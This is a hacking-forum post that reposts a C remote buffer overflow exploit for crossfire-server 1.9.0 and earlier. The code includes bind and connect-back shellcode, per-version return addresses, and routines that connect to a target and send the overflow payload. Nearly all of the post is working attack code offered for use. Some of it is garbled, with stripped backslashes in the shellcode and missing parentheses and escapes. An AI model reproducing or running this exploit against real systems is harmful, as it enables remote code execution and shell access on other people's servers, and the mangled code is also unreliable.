Hacking and more...
HaCkinG CulT 		Lista Forumurilor Pe Tematici
Hacking and more... | Reguli | Inregistrare | Login

POZE HACKING AND MORE...

Nu sunteti logat. 		Nou pe simpatie:
andrum94 Profile
Femeie
24 ani
Galati
cauta Barbat
27 - 80 ani
Hacking and more... / Exploituri si POCs / crossfire-server <1.9.0 SetUp() Remote Buffer Overflow Exploit (linux) Moderat de Shocker
Autor
Mesaj Pagini: 1
epic
User

Inregistrat: acum 18 ani
Postari: 1896
// crossfire-server <= 1.9.0 "SetUp()" remote buffer overflow
//
// exploit by landser - ihsahn at gmail com
// vote
//

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <getopt.h>
#include <arpa/inet.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>

#define PORT 13327 // default port
#define SC_PORT 33333 // default shellcode port
#define SC_HOST "127.0.0.1" // default shellcode host

unsigned char sc_cb[] = // izik's
    "x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
    "x80x5bx5dxbeHOSTxf7xd6x56x66xbdPRx0fxcdx09xdd"
    "x55x43x6ax10x51x50xb0x66x89xe1xcdx80x87xd9"
    "x5bxb0x3fxcdx80x49x79xf9xb0x0bx52x68x2fx2f"
    "x73x68x68x2fx62x69x6ex89xe3x52x53xebxdf";

unsigned char sc_bind[] = // izik's
    "x6ax66x58x99x6ax01x5bx52x53x6ax02x89xe1xcd"
    "x80x5bx5dx52x66xbdPRx0fxcdx09xddx55x6ax10x51"
    "x50x89xe1xb0x66xcdx80xb3x04xb0x66xcdx80x5f"
    "x50x50x57x89xe1x43xb0x66xcdx80x93xb0x02xcd"
    "x80x85xc0x75x1ax59xb0x3fxcdx80x49x79xf9xb0"
    "x0bx68x2fx2fx73x68x68x2fx62x69x6ex89xe3x52"
    "x53xebxb2x6ax06x58xcdx80xb3x04xebxc9";

struct {
    const char *type;
    unsigned char *code;
} shellcodes[] = {
    {"bind",        sc_bind},
    {"connectback",        sc_cb},
};

struct {
    const char *ver;
    unsigned long ret; // a "jmp *%eax" instruction
    unsigned short int len;
} targets[] = {
    {"crossfire-server_1.6.0.dfsg.1-4_i386.deb",    0x080d6f48, 0x1028},
    {"crossfire-server_1.8.0-2_i386.deb",        0x080506d7, 0x1130},
    {"crossfire-server_1.9.0-1_i386.deb",        0x0807aefa, 0x1130},
    {"crash",                    0xcccccccc, 0x1300},
};

#define structsize(x) (sizeof x / sizeof x[0])

int s;
int n = -1;
unsigned char *sc = sc_bind; // default shellcode
unsigned char buf[0x2000];

void establish (char *, int);
void usage (char *);
void update (unsigned char *, int, char *);
void writebuf (void);

int main (int argc, char **argv) {
    int port = 0; // default value
    unsigned short int sc_port = 0;
    char *sc_host = NULL;

    printf("cf190.c by landser - ihsahn at gmail comnn";

    char c;
    while ((c = getopt(argc, argv, "t:p:h:d:s:") != -1) {
        switch (c) {
            case 's': sc = shellcodes[atoi(optarg)].code; break;
            case 'h': sc_host = strdup(optarg); break;
            case 'd': sc_port = atoi(optarg); break;
            case 't': n = atoi(optarg); break;
            case 'p': port = atoi(optarg); break;
            case '?': usage(argv[0]); return EXIT_FAILURE;
        }
    }

    if ((n < 0) || (n >= structsize(targets))) {
        printf("invalid targetn";
        usage(argv[0]);
        return EXIT_FAILURE;
    }
   
    if ((optind + 1) != argc) {
        printf("no hostnamen";
        usage(argv[0]);
        return EXIT_FAILURE;
    }

    establish(argv[optind], port ? port : PORT);
   
    update(sc, sc_port, sc_host);
       
    writebuf();

    printf("> sendingn";

    if (send(s, buf, targets[n].len + 2, 0) < 0) {
        perror("send()";
        return EXIT_FAILURE;
    }
    usleep(100000);

    printf("> donen";
   
    close(s);

    return EXIT_SUCCESS;
}

void establish (char *ip, int port) {
    struct sockaddr_in sa;
    struct hostent *h;

    if (!(h = gethostbyname(ip))) {
        herror("gethostbyname()";
        exit(EXIT_FAILURE);
    }
    printf("> resolved %s to %sn", ip,
            inet_ntoa(**((struct in_addr **)h->h_addr_list)));
   
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr = **((struct in_addr **)h->h_addr_list);
   
    if ((s = socket(AF_INET, SOCK_STREAM, 0)) < 0) {
        perror("socket()";
        exit(EXIT_FAILURE);
    }

    if (connect(s, (struct sockaddr *)&sa, sizeof(struct sockaddr)) < 0) {
        perror("connect()";
        exit(EXIT_FAILURE);
    }

    printf ("> connected to %s:%d.n", inet_ntoa(**((struct in_addr **)h->h_addr_list)), port);
}

void usage (char *argv0) {
    int i;
   
    printf("usage: %s -t <target> [-s <shellcode>] "
            "[-d <connectback/bind port] [-h <connectback ip>] "
            "host [-p <port>]n", argv0);

    printf("- targets:n";
    for (i=0;i<structsize(targets);i++)
        printf("%d. %sn", i, targets[i].ver);

    printf("- shellcodes: (default 0)n";
    for (i=0;i<structsize(shellcodes);i++)
        printf("%d. %sn", i, shellcodes[i].type);
}

void update (unsigned char *code, int port, char *host) {
    if (!port) port = SC_PORT;
   
    if (!(port & 0xff) || !((port >> 8) & 0xff)) {
        printf("bad cb portn";
        exit(EXIT_FAILURE);
    }
    *(unsigned short int *)(strstr(code, "PR") = port;

    if (strstr(code, "HOST") {
        in_addr_t inaddr;

        if (!host) host = SC_HOST;
        inaddr = inet_addr(host);
       
        if (inaddr == INADDR_NONE || strstr(host, "255") {
            // ~(255) is 0
            printf("invalid cb hostnamen";
            exit(EXIT_FAILURE);
        }
        *(in_addr_t *)(strstr(code, "HOST") = ~inaddr;
    }
   
    if (host) free(host);
}
   
void writebuf (void) {
    unsigned char *ptr = buf;
   
    memset(buf, 0x90, sizeof buf);

    *ptr++ = (targets[n].len>> 8) & 0xff;
    *ptr++ = targets[n].len & 0xff;
   
    memcpy(ptr, "setup sound ", strlen("setup sound ");
    ptr += strlen("setup sound ";
   
    ptr += 120; // leave 120 nops before the shellcode
    memcpy(ptr, sc, strlen(sc));
   
    ptr = &buf[targets[n].len - 10];
    *(unsigned long *)ptr = targets[n].ret;
}

_______________________________________
:< 4 8 15 16 23 42 *execute*
TOATA LUMEA ESTE INVITATA PE NOUL FORUM!
pus acum 18 ani
   
Pagini: 1  

Mergi la